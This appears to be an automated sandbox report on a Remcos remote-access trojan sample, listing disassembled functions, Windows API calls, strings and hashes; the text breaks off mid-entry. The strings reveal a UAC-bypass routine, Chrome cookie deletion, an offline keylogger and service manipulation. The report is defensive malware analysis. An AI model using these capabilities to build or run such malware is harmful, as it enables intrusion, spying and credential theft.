                                      • API String ID: 3852720340-0
                                      • Opcode ID: 77796cbaea0b3ceb66a74c68829bdb8ab254cfe55b79cf4433a48a198373e81a
                                      • Instruction ID: 0bec002cf51c6ee45c25e344678903f94fe60d794898ee9a84f5970cb2b0baf1
                                      • Opcode Fuzzy Hash: 77796cbaea0b3ceb66a74c68829bdb8ab254cfe55b79cf4433a48a198373e81a
                                      • Instruction Fuzzy Hash: FD01283658D3319E971726786CC5B6B26C9EB027B67300369F018550D0EF55CC169944
                                      Function 02A075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Windows\SysWOW64\regsvr32.exe), ref: 02A075D0
                                        • Part of subcall function 02A074FD: _wcslen.LIBCMT ref: 02A07521
                                        • Part of subcall function 02A074FD: CoGetObject.OLE32(?,00000024,02A66518,00000000), ref: 02A07582
                                      • CoUninitialize.OLE32 ref: 02A07629
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Windows\SysWOW64\regsvr32.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-1860703646
                                      • Opcode ID: 57c7393ae06a08063ae25639f0dd7869e7d1cd68a6c7ac5ba6fb677614bba50e
                                      • Instruction ID: 24b8bf0eb1cddb7f4176aac6b7c68732b07463779ccfb1585f7e86d48f4762cb
                                      • Opcode Fuzzy Hash: 57c7393ae06a08063ae25639f0dd7869e7d1cd68a6c7ac5ba6fb677614bba50e
                                      • Instruction Fuzzy Hash: 4701CC727402116BF2245BA4ED8EF7BE75CDB44B29F10041EF9028A082EFA1BC014AA1
                                      Function 02A0BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 02A0BADD
                                      • GetLastError.KERNEL32 ref: 02A0BAE7
                                      Strings
                                      • UserProfile, xrefs: 02A0BAAD
                                      • [Chrome Cookies not found], xrefs: 02A0BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 02A0BB0D
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 02A0BAA8
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 80d0d99273683f4f7d313e331343d5817109a416c7811f0dc7591ad5d29a46af
                                      • Instruction ID: 0e5449138cc858ab1b9a68c161cdc9c89580f695a9dce75fd87f224c13b65cd6
                                      • Opcode Fuzzy Hash: 80d0d99273683f4f7d313e331343d5817109a416c7811f0dc7591ad5d29a46af
                                      • Instruction Fuzzy Hash: A4012B31AC02096B97047BB9FFDA8FE773AE922714B400956D403521D4EE124955CAD2
                                      Function 02A1CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocConsole.KERNEL32(02A75338), ref: 02A1CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 02A1CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 02A1CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: d2a0b4998164516770a8a6a4c96a682a9d53f647a358d320141c775f6cbe0a7b
                                      • Instruction ID: f2a3016c7dbadc1bb14df34e570f047b55510de261c50b0cd0ca46dffd7d440c
                                      • Opcode Fuzzy Hash: d2a0b4998164516770a8a6a4c96a682a9d53f647a358d320141c775f6cbe0a7b
                                      • Instruction Fuzzy Hash: 4C01D871DC03087BE600F7F09E4DF5E77AEAB04B10F5008177608A7081DFB4D5154AA5
                                      Function 02A3AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                      Download Yara Rule
                                      APIs
                                      • __allrem.LIBCMT ref: 02A3AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3AC85
                                      • __allrem.LIBCMT ref: 02A3AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3ACBA
                                      • __allrem.LIBCMT ref: 02A3ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02A3ACEF
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction ID: ddc30c4f60fced2821870dfbd573b75d5ed2f634ed1e7455236b29ddb88c6355
                                      • Opcode Fuzzy Hash: 62332627f6279ece4fdf0222086194dbbb93a47f3123b1b6f0685f97dcd8be1f
                                      • Instruction Fuzzy Hash: 67812D72640B269FD7269F78CD80BABB3EAEF40364F24452AF591D7281EF74D9408B50
                                      Function 02A11CFE Relevance: 9.2, APIs: 6, Instructions: 206memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1179C: SetLastError.KERNEL32(0000000D,02A11D1C,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A117A2
                                      • SetLastError.KERNEL32(000000C1,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A11D37
                                      • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,02A11CFA), ref: 02A11DA5
                                      • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,00000000), ref: 02A11DC9
                                        • Part of subcall function 02A11CA3: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,02A11DE7,?,00000000,00003000,00000040,00000000,?,00000000), ref: 02A11CB3
                                      • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,00000000), ref: 02A11E10
                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A11E17
                                      • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02A11F2A
                                        • Part of subcall function 02A12077: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,02A11F37,?,?,?,?,00000000), ref: 02A120E7
                                        • Part of subcall function 02A12077: HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 02A120EE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                                      • String ID:
                                      • API String ID: 3950776272-0
                                      • Opcode ID: 78ba21d54460be00161a7d873c32751d8aa22f6e5ab2e2aae22ca66bb0820ab0
                                      • Instruction ID: 8b373aeaa3f9d0877270a89f78c4f64cde2789b282aca5881c6c8d94cc1d060b
                                      • Opcode Fuzzy Hash: 78ba21d54460be00161a7d873c32751d8aa22f6e5ab2e2aae22ca66bb0820ab0
                                      • Instruction Fuzzy Hash: CF61FF70741311ABCB14AF65CA80B7B7BAAFF84360F04455AEA0D8B681EFB4D851CBD1
                                      Function 02A458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: c77f8ffb2564edde353501350d9b88a728aa9e8429e72a368f26cb05c3ea5ae7
                                      • Instruction ID: 76d9f81ee581a620c429125fc24eb8e47ef1e009b8e82f6982b72e8ff682f7aa
                                      • Opcode Fuzzy Hash: c77f8ffb2564edde353501350d9b88a728aa9e8429e72a368f26cb05c3ea5ae7
                                      • Instruction Fuzzy Hash: 6B512B32D40205AFDB249B69CDC4FAE77BAEFD9334F98422AE81596181DF31D504CAA4
                                      Function 02A0A726 Relevance: 9.2, APIs: 6, Instructions: 163sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00001388), ref: 02A0A740
                                        • Part of subcall function 02A0A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02A0A74D), ref: 02A0A6AB
                                        • Part of subcall function 02A0A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02A0A74D), ref: 02A0A6BA
                                        • Part of subcall function 02A0A675: Sleep.KERNEL32(00002710,?,?,?,02A0A74D), ref: 02A0A6E7
                                        • Part of subcall function 02A0A675: CloseHandle.KERNEL32(00000000,?,?,?,02A0A74D), ref: 02A0A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02A0A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 02A0A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02A0A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02A0A81E
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02A66468,00000000,00000000,00000000), ref: 02A0A927
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID:
                                      • API String ID: 3795512280-0
                                      • Opcode ID: 76cdb5a3db3ff7202f9940115ffad386a45c0978ae9979eb6b38b592db7e7a1e
                                      • Instruction ID: 8c82428eb0d23e5d479f8bc13f59c8a9196ef8ed7caa7d3bfec941ee3125d45c
                                      • Opcode Fuzzy Hash: 76cdb5a3db3ff7202f9940115ffad386a45c0978ae9979eb6b38b592db7e7a1e
                                      • Instruction Fuzzy Hash: 95516D716843045BDB19BB70EAE4AFF73AB9F80354F40081EA6469B1D1DF259909CF92
                                      Function 02A47571 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 389COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: b97455c8c14dedee5f9389442a08906d3655a92ca49788044871efbc66b2e7fb
                                      • Instruction ID: 7264cdf9346049248c7143256783103bbd6a9bbf78074e63bfea65e098ebb7f4
                                      • Opcode Fuzzy Hash: b97455c8c14dedee5f9389442a08906d3655a92ca49788044871efbc66b2e7fb
                                      • Instruction Fuzzy Hash: B9D14571900286CBDB698F68CDC4BBAF7B1FF89304F184559E905AB252DF35D980CBA1
                                      Function 02A10E61 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                      Download Yara Rule
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A10E6E
                                      • int.LIBCPMT ref: 02A10E81
                                        • Part of subcall function 02A0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02A0E0D2
                                        • Part of subcall function 02A0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02A0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02A10EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02A10ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A10EE8
                                      • __Init_thread_footer.LIBCMT ref: 02A10F29
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: b011373676ab88fb9d7a1e6408d1a0c1d04b0f27214f97c1242ad295f5c7485f
                                      • Instruction ID: 120a50e0573f0af936c66312562689377ecfc55a65024501d26d26e237d59bf1
                                      • Opcode Fuzzy Hash: b011373676ab88fb9d7a1e6408d1a0c1d04b0f27214f97c1242ad295f5c7485f
                                      • Instruction Fuzzy Hash: 9D2126329D0514ABC705FBA8EA84D9E77BAEF49730B200556E900A72C0DF31A981CF94
                                      Function 02A1AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,02A1A38E,00000000), ref: 02A1AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,02A1A38E,00000000), ref: 02A1AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACF3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: 713a894be43bb564c39a61d876d0d437c799afcc73a03cd331202d03bd7aa9eb
                                      • Instruction ID: 3aabac21b52a4b170eaa3e6fee71573bd72581ec3c24348fed28e18814bb47eb
                                      • Opcode Fuzzy Hash: 713a894be43bb564c39a61d876d0d437c799afcc73a03cd331202d03bd7aa9eb
                                      • Instruction Fuzzy Hash: FA014531586225BBD6110B78AD8DFBB3B6CDF423B0F000706F9269A1C1DF60CA02E5E0
                                      Function 02A48215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                      • _free.LIBCMT ref: 02A4824C
                                      • _free.LIBCMT ref: 02A48274
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48281
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                      • _abort.LIBCMT ref: 02A48293
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: b30c7074d086cace88075bb93878842fbb24ddf52cf0af9547b19fd3a4183ebe
                                      • Instruction ID: 923d2d04d265672d3cad92cca0cd33ac4c326fa4803562779e4bed47a6b714cd
                                      • Opcode Fuzzy Hash: b30c7074d086cace88075bb93878842fbb24ddf52cf0af9547b19fd3a4183ebe
                                      • Instruction Fuzzy Hash: 00F0F9355C4B006EC71133247C44F5B661A9FC2B65F240A18FD3896180DF2CCC0685E0
                                      Function 02A1AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAFA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 6f2e4fadba4ce3177724e7ca5d91273e1c512069803d274b3b90af000bf08931
                                      • Instruction ID: 30fde4a1acf699801bbb7df8084db1ca927e0c986b293fa3efffda6d8951a5e4
                                      • Opcode Fuzzy Hash: 6f2e4fadba4ce3177724e7ca5d91273e1c512069803d274b3b90af000bf08931
                                      • Instruction Fuzzy Hash: D7F0F631981329BBD711AA24AD88EFF3B6CDF45360F000416FD098A181DF64CD56D9F0
                                      Function 02A1ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABFE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 5e4f322dbaae6996fafcd59e95249043df23bdc12228e28dfaa18e09a33975b4
                                      • Instruction ID: 8592a42fd392b3c7419f0cb2fd03846afaa64f69984440d5bf5b7486b3f82306
                                      • Opcode Fuzzy Hash: 5e4f322dbaae6996fafcd59e95249043df23bdc12228e28dfaa18e09a33975b4
                                      • Instruction Fuzzy Hash: 8EF0C231981229ABD6116A64AC89EFF3B6CDF45360F400416FE099A141DF28CD16D9F0
                                      Function 02A1AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 1e5e16b28bde9237b6d828000447b5991d617eb0b5ef2face4648d3066872fb7
                                      • Instruction ID: 5c6d8c32243049fc7fd34daa55b73488fa64b3e0f503e08f48a7f8ed915b2bf4
                                      • Opcode Fuzzy Hash: 1e5e16b28bde9237b6d828000447b5991d617eb0b5ef2face4648d3066872fb7
                                      • Instruction Fuzzy Hash: 47F0C231981229ABD611AA64AC88EFF3B6CDF45361F000816FE0D9A141EF28CE1699E0
                                      Function 02A1AA4A Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02A1A6A0,00000000), ref: 02A1AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02A1A6A0,00000000), ref: 02A1AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02A1A6A0,00000000), ref: 02A1AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 94fe934595013e741923d728e4885cfc269a3808be19cac57770b02600e63419
                                      • Instruction ID: d3406a30086a867490887e3583a1dda1c6806ad00cb4394e87a093e1517217b9
                                      • Opcode Fuzzy Hash: 94fe934595013e741923d728e4885cfc269a3808be19cac57770b02600e63419
                                      • Instruction Fuzzy Hash: 6CF08271981336AFD211AB20ADC8DFF2B6CDF857A5B000C1AF945961809F68CD5AE9F1
                                      Function 02A1B68A Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 02A1361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,02A750E4), ref: 02A1363D
                                        • Part of subcall function 02A1361B: RegQueryValueExW.ADVAPI32(?,02A0F313,00000000,00000000,?,00000400), ref: 02A1365C
                                        • Part of subcall function 02A1361B: RegCloseKey.ADVAPI32(?), ref: 02A13665
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                      • _wcslen.LIBCMT ref: 02A1B763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                      • API String ID: 37874593-4246244872
                                      • Opcode ID: d2e56c655853772f3c4e861df7c3392cef9ed3da4e344e3a48119d78c522ef47
                                      • Instruction ID: 37382350cbcfdbf21b52e46c834238ea982695508f7477cd661a917efdbd1284
                                      • Opcode Fuzzy Hash: d2e56c655853772f3c4e861df7c3392cef9ed3da4e344e3a48119d78c522ef47
                                      • Instruction Fuzzy Hash: 6821B662A802046BDB14BAB49ED8EFE776F9F45734F04083FE406A72C1EE648D084B61
                                      Function 02A0B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                      • wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: f9352b03163520a858a6035582aa82ecfdab6641eaf97f31f49195aaceb84698
                                      • Instruction ID: ce76e6093ccf2ce2fae43d84c59540c6cf9ab516a7c63d78dfd2ff9c02793bcd
                                      • Opcode Fuzzy Hash: f9352b03163520a858a6035582aa82ecfdab6641eaf97f31f49195aaceb84698
                                      • Instruction Fuzzy Hash: A5117F72944118AA8B19AB94F9D48FF77BEAE08351B00011BF406960D0EF789E46CAA4
                                      Function 02A1D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 02A1D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02A1D576
                                      • GetLastError.KERNEL32 ref: 02A1D580
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: 6eac282b5a28873332b4196e42b1f7d01e0b9647c0fac7b0b377d872146cc8b2
                                      • Instruction ID: 49f9a96ab5f6c13750d1a0ab98e90407820a76ab7f82fc322259524eed28ad9c
                                      • Opcode Fuzzy Hash: 6eac282b5a28873332b4196e42b1f7d01e0b9647c0fac7b0b377d872146cc8b2
                                      • Instruction Fuzzy Hash: 5301E9B1D00229ABDB11DFD5ECC49EFBBBDEA04264F40052AF914A6240EB7599058AA0
                                      Function 02A07755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                      Download Yara Rule
                                      APIs
